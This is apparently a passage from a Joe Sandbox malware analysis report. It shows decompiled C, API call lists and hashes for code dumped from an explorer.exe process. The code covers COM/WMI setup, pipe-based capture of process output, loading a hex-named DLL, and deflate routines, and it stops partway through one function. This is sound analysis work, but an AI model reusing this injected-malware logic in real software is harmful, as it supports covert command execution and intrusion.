                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: String$AllocFree
                                          • String ID:
                                          • API String ID: 344208780-0
                                          • Opcode ID: 44420c4829f5bce14ab5226167260ede4167301a681125feba629d3f2e7185a8
                                          • Instruction ID: 3d9f34c9eecb127b5d7570106aa8ec4b723249f91a2853b660b7b91b34ec35e3
                                          • Opcode Fuzzy Hash: 44420c4829f5bce14ab5226167260ede4167301a681125feba629d3f2e7185a8
                                          • Instruction Fuzzy Hash: 5A21F875900218BFDB10DFA5CC88DAFBBBDEF48354B1044AAF505A7250EA71AE01CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: @$\u%04X$\u%04X\u%04X
                                          • API String ID: 0-2132903582
                                          • Opcode ID: 5c4a3dcad14d073debbc25b81825f3e4875a0567a15792a86c44d49d2579c3be
                                          • Instruction ID: 3547e2d1494ab77912d377d0d288dcf2f58bd85626a5821c1112c12d5c5f1659
                                          • Opcode Fuzzy Hash: 5c4a3dcad14d073debbc25b81825f3e4875a0567a15792a86c44d49d2579c3be
                                          • Instruction Fuzzy Hash: C5412C31600305A7EF785A68CC69BFEAA98DF84350F240027F98DD6356D661CD9197F1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 30%
                                          			E000CD523(void* __ecx) {
                                          				char _v8;
                                          				void* _v12;
                                          				char* _t15;
                                          				intOrPtr* _t16;
                                          				void* _t21;
                                          				intOrPtr* _t23;
                                          				intOrPtr* _t24;
                                          				intOrPtr* _t25;
                                          				void* _t30;
                                          				void* _t33;
                                          
                                          				_v12 = 0;
                                          				_v8 = 0;
                                          				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
                                          				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
                                          				_t15 =  &_v12;
                                          				__imp__CoCreateInstance(0xdb848, 0, 1, 0xdb858, _t15);
                                          				if(_t15 < 0) {
                                          					L5:
                                          					_t23 = _v8;
                                          					if(_t23 != 0) {
                                          						 *((intOrPtr*)( *_t23 + 8))(_t23);
                                          					}
                                          					_t24 = _v12;
                                          					if(_t24 != 0) {
                                          						 *((intOrPtr*)( *_t24 + 8))(_t24);
                                          					}
                                          					_t16 = 0;
                                          				} else {
                                          					__imp__#2(__ecx);
                                          					_t25 = _v12;
                                          					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
                                          					if(_t21 < 0) {
                                          						goto L5;
                                          					} else {
                                          						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
                                          						if(_t21 < 0) {
                                          							goto L5;
                                          						} else {
                                          							_t16 = E000C8604(8);
                                          							if(_t16 == 0) {
                                          								goto L5;
                                          							} else {
                                          								 *((intOrPtr*)(_t16 + 4)) = _v12;
                                          								 *_t16 = _v8;
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _t16;
                                          			}














                                          APIs
                                          • CoInitializeEx.OLE32(00000000,00000000), ref: 000CD536
                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 000CD547
                                          • CoCreateInstance.OLE32(000DB848,00000000,00000001,000DB858,?), ref: 000CD55E
                                          • SysAllocString.OLEAUT32(00000000), ref: 000CD569
                                          • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 000CD594
                                            • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
                                          • String ID:
                                          • API String ID: 1610782348-0
                                          • Opcode ID: 9262fb1cee6356bb2d2bedcff923adbaefdfcc94595994d41f249e05877c609d
                                          • Instruction ID: b52495c3964bc2eee305646e62cfc807d5bb65c34ee2dbb5966ceb0035954956
                                          • Opcode Fuzzy Hash: 9262fb1cee6356bb2d2bedcff923adbaefdfcc94595994d41f249e05877c609d
                                          • Instruction Fuzzy Hash: 3821EA74601245BFEB249B66DC4DE6FBFBCEFC6B15F10416EB901A6290DA709A01CB30
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 79%
                                          			E000D21FF(char* __eax, char** _a4, long long* _a8) {
                                          				char* _v8;
                                          				long long _v16;
                                          				char* _t9;
                                          				signed char _t11;
                                          				char** _t19;
                                          				char _t22;
                                          				long long _t32;
                                          				long long _t33;
                                          
                                          				_t9 = __eax;
                                          				L000D22CD();
                                          				_t19 = _a4;
                                          				_t22 =  *__eax;
                                          				if( *_t22 != 0x2e) {
                                          					_t9 = strchr( *_t19, 0x2e);
                                          					if(_t9 != 0) {
                                          						 *_t9 =  *_t22;
                                          					}
                                          				}
                                          				L000D2291();
                                          				 *_t9 =  *_t9 & 0x00000000;
                                          				_t11 = strtod( *_t19,  &_v8);
                                          				asm("fst qword [ebp-0xc]");
                                          				_t32 =  *0xd8250;
                                          				asm("fucomp st1");
                                          				asm("fnstsw ax");
                                          				if((_t11 & 0x00000044) != 0) {
                                          					L5:
                                          					st0 = _t32;
                                          					L000D2291();
                                          					if( *_t11 != 0x22) {
                                          						_t33 = _v16;
                                          						goto L8;
                                          					} else {
                                          						return _t11 | 0xffffffff;
                                          					}
                                          				} else {
                                          					_t33 =  *0xd8258;
                                          					asm("fucomp st1");
                                          					asm("fnstsw ax");
                                          					if((_t11 & 0x00000044) != 0) {
                                          						L8:
                                          						 *_a8 = _t33;
                                          						return 0;
                                          					} else {
                                          						goto L5;
                                          					}
                                          				}
                                          			}

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _errno$localeconvstrchrstrtod
                                          • String ID:
                                          • API String ID: 1035490122-0
                                          • Opcode ID: aceb4110dc66301c355acdaa5611ac5f99a5334a39e134f6b0ec4c9c9ba2d16c
                                          • Instruction ID: 02ad6d30cf94f535e5970a8dc70227cda6efb6bc9110fd6e31c748a412764503
                                          • Opcode Fuzzy Hash: aceb4110dc66301c355acdaa5611ac5f99a5334a39e134f6b0ec4c9c9ba2d16c
                                          • Instruction Fuzzy Hash: A7012435804305FADB122F25E9026FD3BA4AFAA360F2041C2F980672A2CB358854DBB4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 73%
                                          			E000CA9B7(signed int __ecx) {
                                          				void* _v8;
                                          				void* _v12;
                                          				void* _v16;
                                          				void* _v20;
                                          				signed int _v24;
                                          				char _v28;
                                          				char _v32;
                                          				char _v36;
                                          				struct _SECURITY_ATTRIBUTES _v48;
                                          				intOrPtr _v60;
                                          				char _v64;
                                          				intOrPtr _v76;
                                          				intOrPtr _v80;
                                          				void* _v84;
                                          				short _v92;
                                          				intOrPtr _v96;
                                          				void _v140;
                                          				intOrPtr _t77;
                                          				void* _t79;
                                          				intOrPtr _t85;
                                          				intOrPtr _t87;
                                          				intOrPtr _t89;
                                          				intOrPtr _t92;
                                          				intOrPtr _t98;
                                          				intOrPtr _t100;
                                          				intOrPtr _t102;
                                          				long _t111;
                                          				intOrPtr _t115;
                                          				intOrPtr _t126;
                                          				void* _t127;
                                          				void* _t128;
                                          				void* _t129;
                                          				void* _t130;
                                          
                                          				_t111 = 0;
                                          				_v24 = __ecx;
                                          				_v12 = 0;
                                          				_v20 = 0;
                                          				_t127 = 0;
                                          				_v8 = 0;
                                          				_v16 = 0;
                                          				_v48.nLength = 0xc;
                                          				_v48.lpSecurityDescriptor = 0;
                                          				_v48.bInheritHandle = 1;
                                          				_v28 = 0;
                                          				memset( &_v140, 0, 0x44);
                                          				asm("stosd");
                                          				_t130 = _t129 + 0xc;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
                                          					L18:
                                          					return 0;
                                          				}
                                          				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
                                          					L13:
                                          					E000C861A( &_v28, 0);
                                          					if(_v20 != 0) {
                                          						_t77 =  *0xde684; // 0x14cf8f0
                                          						 *((intOrPtr*)(_t77 + 0x30))(_v20);
                                          					}
                                          					if(_v8 != 0) {
                                          						_t115 =  *0xde684; // 0x14cf8f0
                                          						 *((intOrPtr*)(_t115 + 0x30))(_v8);
                                          					}
                                          					return _t111;
                                          				}
                                          				_t79 = _v16;
                                          				_v76 = _t79;
                                          				_v80 = _t79;
                                          				_v84 = _v12;
                                          				_v140 = 0x44;
                                          				_v96 = 0x101;
                                          				_v92 = 0;
                                          				_t126 = E000C8604(0x1001);
                                          				_v28 = _t126;
                                          				if(_t126 == 0) {
                                          					goto L18;
                                          				}
                                          				_push( &_v64);
                                          				_push( &_v140);
                                          				_t85 =  *0xde684; // 0x14cf8f0
                                          				_push(0);
                                          				_push(0);
                                          				_push(0x8000000);
                                          				_push(1);
                                          				_push(0);
                                          				_push(0);
                                          				_push(_v24);
                                          				_push(0);
                                          				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
                                          					goto L13;
                                          				}
                                          				_t87 =  *0xde684; // 0x14cf8f0
                                          				 *((intOrPtr*)(_t87 + 0x30))(_v12);
                                          				_t89 =  *0xde684; // 0x14cf8f0
                                          				 *((intOrPtr*)(_t89 + 0x30))(_v16);
                                          				_v24 = _v24 & 0;
                                          				do {
                                          					_t92 =  *0xde684; // 0x14cf8f0
                                          					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
                                          					 *((char*)(_v24 + _t126)) = 0;
                                          					if(_t111 == 0) {
                                          						_t127 = E000C91A6(_t126, 0);
                                          					} else {
                                          						_push(0);
                                          						_push(_t126);
                                          						_v32 = _t127;
                                          						_t127 = E000C9292(_t127);
                                          						E000C861A( &_v32, 0xffffffff);
                                          						_t130 = _t130 + 0x14;
                                          					}
                                          					_t111 = _t127;
                                          					_v32 = _t127;
                                          				} while (_v36 != 0);
                                          				_push( &_v36);
                                          				_push(E000CC379(_t127));
                                          				_t98 =  *0xde68c; // 0x14cfab8
                                          				_push(_t127);
                                          				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
                                          					L12:
                                          					_t100 =  *0xde684; // 0x14cf8f0
                                          					 *((intOrPtr*)(_t100 + 0x30))(_v64);
                                          					_t102 =  *0xde684; // 0x14cf8f0
                                          					 *((intOrPtr*)(_t102 + 0x30))(_v60);
                                          					goto L13;
                                          				}
                                          				_t128 = E000C9256(_t127);
                                          				if(_t128 == 0) {
                                          					goto L12;
                                          				}
                                          				E000C861A( &_v32, 0);
                                          				return _t128;
                                          			}

                                          APIs
                                          • memset.MSVCRT ref: 000CA9F4
                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 000CAA18
                                          • CreatePipe.KERNEL32(000C65A9,?,0000000C,00000000), ref: 000CAA2F
                                            • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
                                            • Part of subcall function 000C861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000C8660
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateHeapPipe$AllocateFreememset
                                          • String ID: D
                                          • API String ID: 2365139273-2746444292
                                          • Opcode ID: 65f06a4a2bef680f92b27d2d990ddab298a87e6d022ce6ef6432917450b0d7e6
                                          • Instruction ID: ee5a40d96a8d170e39ef4db7aa177635ee1e57970e24f23723ed2304e9932c98
                                          • Opcode Fuzzy Hash: 65f06a4a2bef680f92b27d2d990ddab298a87e6d022ce6ef6432917450b0d7e6
                                          • Instruction Fuzzy Hash: 69512972E00209AFEB51DFA4CC85FEEB7B9EB08304F10416AF504E7292DB749E048B65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 89%
                                          			E000CC4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                          				char _v8;
                                          				char _v12;
                                          				void _v140;
                                          				signed char _t14;
                                          				char _t15;
                                          				intOrPtr _t20;
                                          				void* _t25;
                                          				intOrPtr _t26;
                                          				intOrPtr _t32;
                                          				WCHAR* _t34;
                                          				intOrPtr _t35;
                                          				struct HINSTANCE__* _t37;
                                          				int _t38;
                                          				intOrPtr _t46;
                                          				void* _t47;
                                          				intOrPtr _t50;
                                          				void* _t60;
                                          				void* _t61;
                                          				char _t62;
                                          				char* _t63;
                                          				void* _t65;
                                          				intOrPtr _t66;
                                          				char _t68;
                                          
                                          				_t65 = __esi;
                                          				_t61 = __edi;
                                          				_t47 = __ebx;
                                          				_t50 =  *0xde688; // 0xf0000
                                          				_t14 =  *(_t50 + 0x1898);
                                          				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
                                          					_t15 = E000C95E1(_t50, 0xb62);
                                          					_t66 =  *0xde688; // 0xf0000
                                          					_t62 = _t15;
                                          					_t67 = _t66 + 0xb0;
                                          					_v8 = _t62;
                                          					E000C9640( &_v140, 0x40, L"%08x", E000CD400(_t66 + 0xb0, E000CC379(_t66 + 0xb0), 0));
                                          					_t20 =  *0xde688; // 0xf0000
                                          					asm("sbb eax, eax");
                                          					_t25 = E000C95E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
                                          					_t63 = "\\";
                                          					_t26 =  *0xde688; // 0xf0000
                                          					_t68 = E000C92E5(_t26 + 0x1020);
                                          					_v12 = _t68;
                                          					E000C85D5( &_v8);
                                          					_t32 =  *0xde688; // 0xf0000
                                          					_t34 = E000C92E5(_t32 + 0x122a);
                                          					 *0xde784 = _t34;
                                          					_t35 =  *0xde684; // 0x14cf8f0
                                          					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
                                          					_t37 = LoadLibraryW( *0xde784);
                                          					 *0xde77c = _t37;
                                          					if(_t37 == 0) {
                                          						_t38 = 0;
                                          					} else {
                                          						_push(_t37);
                                          						_t60 = 0x28;
                                          						_t38 = E000CE171(0xdbb48, _t60);
                                          					}
                                          					 *0xde780 = _t38;
                                          					E000C861A( &_v12, 0xfffffffe);
                                          					memset( &_v140, 0, 0x80);
                                          					if( *0xde780 != 0) {
                                          						goto L10;
                                          					} else {
                                          						E000C861A(0xde784, 0xfffffffe);
                                          						goto L8;
                                          					}
                                          				} else {
                                          					L8:
                                          					if( *0xde780 == 0) {
                                          						_t46 =  *0xde6bc; // 0x14cfa18
                                          						 *0xde780 = _t46;
                                          					}
                                          					L10:
                                          					return 1;
                                          				}
                                          			}

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoadmemset
                                          • String ID: %08x$dll
                                          • API String ID: 3406617148-2963171978
                                          • Opcode ID: 11a4996b2332424ec37d0d3581d2029684f0cd19d397c3050441eee7ff692f5f
                                          • Instruction ID: 7bb140d26ea90620d688a4d55edfb562bb055213326fc88d9619b145c98fbc54
                                          • Opcode Fuzzy Hash: 11a4996b2332424ec37d0d3581d2029684f0cd19d397c3050441eee7ff692f5f
                                          • Instruction Fuzzy Hash: A7319572A01244ABFB50AB64DC89F9E33ACEB54354F14402FF909DB292DB78D9458734
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 99%
                                          			E000D2D70(int _a4, signed int _a8) {
                                          				int _v8;
                                          				intOrPtr _v12;
                                          				signed int _v16;
                                          				void* __esi;
                                          				void* _t137;
                                          				signed int _t141;
                                          				intOrPtr* _t142;
                                          				signed int _t145;
                                          				signed int _t146;
                                          				intOrPtr _t151;
                                          				intOrPtr _t161;
                                          				intOrPtr _t162;
                                          				intOrPtr _t167;
                                          				intOrPtr _t170;
                                          				signed int _t172;
                                          				intOrPtr _t173;
                                          				int _t184;
                                          				intOrPtr _t185;
                                          				intOrPtr _t188;
                                          				signed int _t189;
                                          				void* _t195;
                                          				int _t202;
                                          				int _t208;
                                          				intOrPtr _t217;
                                          				signed int _t218;
                                          				int _t219;
                                          				intOrPtr _t220;
                                          				signed int _t221;
                                          				signed int _t222;
                                          				int _t224;
                                          				int _t225;
                                          				signed int _t227;
                                          				intOrPtr _t228;
                                          				int _t232;
                                          				int _t234;
                                          				signed int _t235;
                                          				int _t239;
                                          				void* _t240;
                                          				int _t245;
                                          				int _t252;
                                          				signed int _t253;
                                          				int _t254;
                                          				void* _t257;
                                          				void* _t258;
                                          				int _t259;
                                          				intOrPtr _t260;
                                          				int _t261;
                                          				signed int _t269;
                                          				signed int _t271;
                                          				intOrPtr* _t272;
                                          				void* _t273;
                                          
                                          				_t253 = _a8;
                                          				_t272 = _a4;
                                          				_t3 = _t272 + 0xc; // 0x452bf84d
                                          				_t4 = _t272 + 0x2c; // 0x8df075ff
                                          				_t228 =  *_t4;
                                          				_t137 =  *_t3 + 0xfffffffb;
                                          				_t229 =  <=  ? _t137 : _t228;
                                          				_v16 =  <=  ? _t137 : _t228;
                                          				_t269 = 0;
                                          				_a4 =  *((intOrPtr*)( *_t272 + 4));
                                          				asm("o16 nop [eax+eax]");
                                          				while(1) {
                                          					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
                                          					_t141 =  *_t8 + 0x2a >> 3;
                                          					_v12 = 0xffff;
                                          					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
                                          					if(_t217 < _t141) {
                                          						break;
                                          					}
                                          					_t11 = _t272 + 0x6c; // 0xa1ec8b55
                                          					_t12 = _t272 + 0x5c; // 0x84e85000
                                          					_t245 =  *_t11 -  *_t12;
                                          					_v8 = _t245;
                                          					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
                                          					_t247 =  <  ? _t195 : _v12;
                                          					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
                                          					if(_t227 >= _v16) {
                                          						L7:
                                          						if(_t253 != 4) {
                                          							L10:
                                          							_t269 = 0;
                                          							__eflags = 0;
                                          						} else {
                                          							_t285 = _t227 - _t195;
                                          							if(_t227 != _t195) {
                                          								goto L10;
                                          							} else {
                                          								_t269 = _t253 - 3;
                                          							}
                                          						}
                                          						E000D5D90(_t272, _t272, 0, 0, _t269);
                                          						_t18 = _t272 + 0x14; // 0xc703f045
                                          						_t19 = _t272 + 8; // 0x8d000040
                                          						 *( *_t18 +  *_t19 - 4) = _t227;
                                          						_t22 = _t272 + 0x14; // 0xc703f045
                                          						_t23 = _t272 + 8; // 0x8d000040
                                          						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
                                          						_t26 = _t272 + 0x14; // 0xc703f045
                                          						_t27 = _t272 + 8; // 0x8d000040
                                          						 *( *_t26 +  *_t27 - 2) =  !_t227;
                                          						_t30 = _t272 + 0x14; // 0xc703f045
                                          						_t31 = _t272 + 8; // 0x8d000040
                                          						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
                                          						E000D4AF0(_t285,  *_t272);
                                          						_t202 = _v8;
                                          						_t273 = _t273 + 0x14;
                                          						if(_t202 != 0) {
                                          							_t208 =  >  ? _t227 : _t202;
                                          							_v8 = _t208;
                                          							_t36 = _t272 + 0x38; // 0xf47d8bff
                                          							_t37 = _t272 + 0x5c; // 0x84e85000
                                          							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
                                          							_t273 = _t273 + 0xc;
                                          							_t252 = _v8;
                                          							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
                                          							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
                                          							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
                                          							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
                                          							_t227 = _t227 - _t252;
                                          						}
                                          						if(_t227 != 0) {
                                          							E000D4C30( *_t272,  *( *_t272 + 0xc), _t227);
                                          							_t273 = _t273 + 0xc;
                                          							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
                                          							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
                                          							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
                                          						}
                                          						_t253 = _a8;
                                          						if(_t269 == 0) {
                                          							continue;
                                          						}
                                          					} else {
                                          						if(_t227 != 0 || _t253 == 4) {
                                          							if(_t253 != 0 && _t227 == _t195) {
                                          								goto L7;
                                          							}
                                          						}
                                          					}
                                          					break;
                                          				}
                                          				_t142 =  *_t272;
                                          				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
                                          				_a4 = _t232;
                                          				if(_t232 == 0) {
                                          					_t83 = _t272 + 0x6c; // 0xa1ec8b55
                                          					_t254 =  *_t83;
                                          				} else {
                                          					_t59 = _t272 + 0x2c; // 0x8df075ff
                                          					_t224 =  *_t59;
                                          					if(_t232 < _t224) {
                                          						_t65 = _t272 + 0x3c; // 0x830cc483
                                          						_t66 = _t272 + 0x6c; // 0xa1ec8b55
                                          						_t260 =  *_t66;
                                          						__eflags =  *_t65 - _t260 - _t232;
                                          						if( *_t65 - _t260 <= _t232) {
                                          							_t67 = _t272 + 0x38; // 0xf47d8bff
                                          							_t261 = _t260 - _t224;
                                          							 *(_t272 + 0x6c) = _t261;
                                          							memcpy( *_t67,  *_t67 + _t224, _t261);
                                          							_t70 = _t272 + 0x16b0; // 0xdf750008
                                          							_t188 =  *_t70;
                                          							_t273 = _t273 + 0xc;
                                          							_t232 = _a4;
                                          							__eflags = _t188 - 2;
                                          							if(_t188 < 2) {
                                          								_t189 = _t188 + 1;
                                          								__eflags = _t189;
                                          								 *(_t272 + 0x16b0) = _t189;
                                          							}
                                          						}
                                          						_t73 = _t272 + 0x38; // 0xf47d8bff
                                          						_t74 = _t272 + 0x6c; // 0xa1ec8b55
                                          						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
                                          						_t225 = _a4;
                                          						_t273 = _t273 + 0xc;
                                          						_t76 = _t272 + 0x6c;
                                          						 *_t76 =  *(_t272 + 0x6c) + _t225;
                                          						__eflags =  *_t76;
                                          						_t78 = _t272 + 0x6c; // 0xa1ec8b55
                                          						_t184 =  *_t78;
                                          						_t79 = _t272 + 0x2c; // 0x8df075ff
                                          						_t239 =  *_t79;
                                          					} else {
                                          						 *(_t272 + 0x16b0) = 2;
                                          						_t61 = _t272 + 0x38; // 0xf47d8bff
                                          						memcpy( *_t61,  *_t142 - _t224, _t224);
                                          						_t62 = _t272 + 0x2c; // 0x8df075ff
                                          						_t184 =  *_t62;
                                          						_t273 = _t273 + 0xc;
                                          						_t225 = _a4;
                                          						_t239 = _t184;
                                          						 *(_t272 + 0x6c) = _t184;
                                          					}
                                          					_t254 = _t184;
                                          					 *(_t272 + 0x5c) = _t184;
                                          					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
                                          					_t185 =  *_t81;
                                          					_t240 = _t239 - _t185;
                                          					_t241 =  <=  ? _t225 : _t240;
                                          					_t242 = ( <=  ? _t225 : _t240) + _t185;
                                          					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
                                          				}
                                          				if( *(_t272 + 0x16c0) < _t254) {
                                          					 *(_t272 + 0x16c0) = _t254;
                                          				}
                                          				if(_t269 == 0) {
                                          					_t218 = _a8;
                                          					__eflags = _t218;
                                          					if(_t218 == 0) {
                                          						L34:
                                          						_t89 = _t272 + 0x3c; // 0x830cc483
                                          						_t219 =  *_t272;
                                          						_t145 =  *_t89 - _t254 - 1;
                                          						_a4 =  *_t272;
                                          						_t234 = _t254;
                                          						_v16 = _t145;
                                          						_v8 = _t254;
                                          						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
                                          						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
                                          							_v8 = _t254;
                                          							_t95 = _t272 + 0x5c; // 0x84e85000
                                          							_a4 = _t219;
                                          							_t234 = _t254;
                                          							_t97 = _t272 + 0x2c; // 0x8df075ff
                                          							__eflags =  *_t95 -  *_t97;
                                          							if( *_t95 >=  *_t97) {
                                          								_t98 = _t272 + 0x2c; // 0x8df075ff
                                          								_t167 =  *_t98;
                                          								_t259 = _t254 - _t167;
                                          								_t99 = _t272 + 0x38; // 0xf47d8bff
                                          								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
                                          								 *(_t272 + 0x6c) = _t259;
                                          								memcpy( *_t99, _t167 +  *_t99, _t259);
                                          								_t103 = _t272 + 0x16b0; // 0xdf750008
                                          								_t170 =  *_t103;
                                          								_t273 = _t273 + 0xc;
                                          								__eflags = _t170 - 2;
                                          								if(_t170 < 2) {
                                          									_t172 = _t170 + 1;
                                          									__eflags = _t172;
                                          									 *(_t272 + 0x16b0) = _t172;
                                          								}
                                          								_t106 = _t272 + 0x2c; // 0x8df075ff
                                          								_t145 = _v16 +  *_t106;
                                          								__eflags = _t145;
                                          								_a4 =  *_t272;
                                          								_t108 = _t272 + 0x6c; // 0xa1ec8b55
                                          								_t234 =  *_t108;
                                          								_v8 = _t234;
                                          							}
                                          						}
                                          						_t255 = _a4;
                                          						_t220 =  *((intOrPtr*)(_a4 + 4));
                                          						__eflags = _t145 - _t220;
                                          						_t221 =  <=  ? _t145 : _t220;
                                          						_t146 = _t221;
                                          						_a4 = _t221;
                                          						_t222 = _a8;
                                          						__eflags = _t146;
                                          						if(_t146 != 0) {
                                          							_t114 = _t272 + 0x38; // 0xf47d8bff
                                          							E000D4C30(_t255,  *_t114 + _v8, _t146);
                                          							_t273 = _t273 + 0xc;
                                          							_t117 = _t272 + 0x6c;
                                          							 *_t117 =  *(_t272 + 0x6c) + _a4;
                                          							__eflags =  *_t117;
                                          							_t119 = _t272 + 0x6c; // 0xa1ec8b55
                                          							_t234 =  *_t119;
                                          						}
                                          						__eflags =  *(_t272 + 0x16c0) - _t234;
                                          						if( *(_t272 + 0x16c0) < _t234) {
                                          							 *(_t272 + 0x16c0) = _t234;
                                          						}
                                          						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
                                          						_t123 = _t272 + 0xc; // 0x452bf84d
                                          						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
                                          						__eflags = _t257 - 0xffff;
                                          						_t258 =  >  ? 0xffff : _t257;
                                          						_t124 = _t272 + 0x2c; // 0x8df075ff
                                          						_t151 =  *_t124;
                                          						_t125 = _t272 + 0x5c; // 0x84e85000
                                          						_t235 = _t234 -  *_t125;
                                          						__eflags = _t258 - _t151;
                                          						_t152 =  <=  ? _t258 : _t151;
                                          						__eflags = _t235 - ( <=  ? _t258 : _t151);
                                          						if(_t235 >= ( <=  ? _t258 : _t151)) {
                                          							L49:
                                          							__eflags = _t235 - _t258;
                                          							_t154 =  >  ? _t258 : _t235;
                                          							_a4 =  >  ? _t258 : _t235;
                                          							__eflags = _t222 - 4;
                                          							if(_t222 != 4) {
                                          								L53:
                                          								_t269 = 0;
                                          								__eflags = 0;
                                          							} else {
                                          								_t161 =  *_t272;
                                          								__eflags =  *(_t161 + 4);
                                          								_t154 = _a4;
                                          								if( *(_t161 + 4) != 0) {
                                          									goto L53;
                                          								} else {
                                          									__eflags = _t154 - _t235;
                                          									if(_t154 != _t235) {
                                          										goto L53;
                                          									} else {
                                          										_t269 = _t222 - 3;
                                          									}
                                          								}
                                          							}
                                          							_t131 = _t272 + 0x38; // 0xf47d8bff
                                          							_t132 = _t272 + 0x5c; // 0x84e85000
                                          							E000D5D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
                                          							_t134 = _t272 + 0x5c;
                                          							 *_t134 =  *(_t272 + 0x5c) + _a4;
                                          							__eflags =  *_t134;
                                          							E000D4AF0( *_t134,  *_t272);
                                          						} else {
                                          							__eflags = _t235;
                                          							if(_t235 != 0) {
                                          								L46:
                                          								__eflags = _t222;
                                          								if(_t222 != 0) {
                                          									_t162 =  *_t272;
                                          									__eflags =  *(_t162 + 4);
                                          									if( *(_t162 + 4) == 0) {
                                          										__eflags = _t235 - _t258;
                                          										if(_t235 <= _t258) {
                                          											goto L49;
                                          										}
                                          									}
                                          								}
                                          							} else {
                                          								__eflags = _t222 - 4;
                                          								if(_t222 == 4) {
